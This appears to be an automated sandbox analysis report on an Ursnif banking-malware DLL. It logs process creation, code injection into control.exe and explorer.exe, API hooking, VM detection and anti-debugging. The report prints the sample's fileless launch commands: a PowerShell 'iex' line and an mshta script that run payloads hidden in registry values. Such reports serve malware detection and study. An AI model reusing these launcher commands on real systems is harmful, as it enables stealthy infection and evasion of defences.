Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04A010B4 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,

1_2_04A010B4

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\mal.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A11CB0 push ecx; ret	1_2_04A11CB9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A02746 push ecx; mov dword ptr [esp], 00000002h	1_2_04A02747
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A121A3 push ecx; ret	1_2_04A121B3

Source: initial sample

Static PE information: section name: .text entropy: 6.91369590401

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3135
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5852

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336	Thread sleep count: 86 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336	Thread sleep count: 70 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5336	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3820	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3820	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3820	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676	Thread sleep time: -9223372036854770s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A1056C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_04A1056C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_049FBF1E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_049FBF1E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A0AF0E lstrlenW,wcscpy,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_04A0AF0E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04A09363 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_04A09363

Source: C:\Windows\SysWOW64\regsvr32.exe

1_2_04A05ECD

Source: mshta.exe, 0000001E.00000003.501243554.0000026060CFA000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B_sG
Source: control.exe, 00000026.00000002.560578207.0000018E59DD6000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\k

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04A010B4 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,

1_2_04A010B4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04A03589 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

1_2_04A03589

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Memory allocated: C:\Windows\System32\control.exe base: D30000 protect: page execute and read and write

Jump to behavior

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFB736E1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 736E1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: 736E1580

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 6348	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5516

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7028E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: D30000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7028E12E0	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kboh4jur\kboh4jur.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xjciegge\xjciegge.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3736.tmp' 'c:\Users\user\AppData\Local\Temp\kboh4jur\CSC3D4FC79349B84E14A11DB5BE381E50D0.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES48CA.tmp' 'c:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP'
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04A08436 cpuid

1_2_04A08436

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
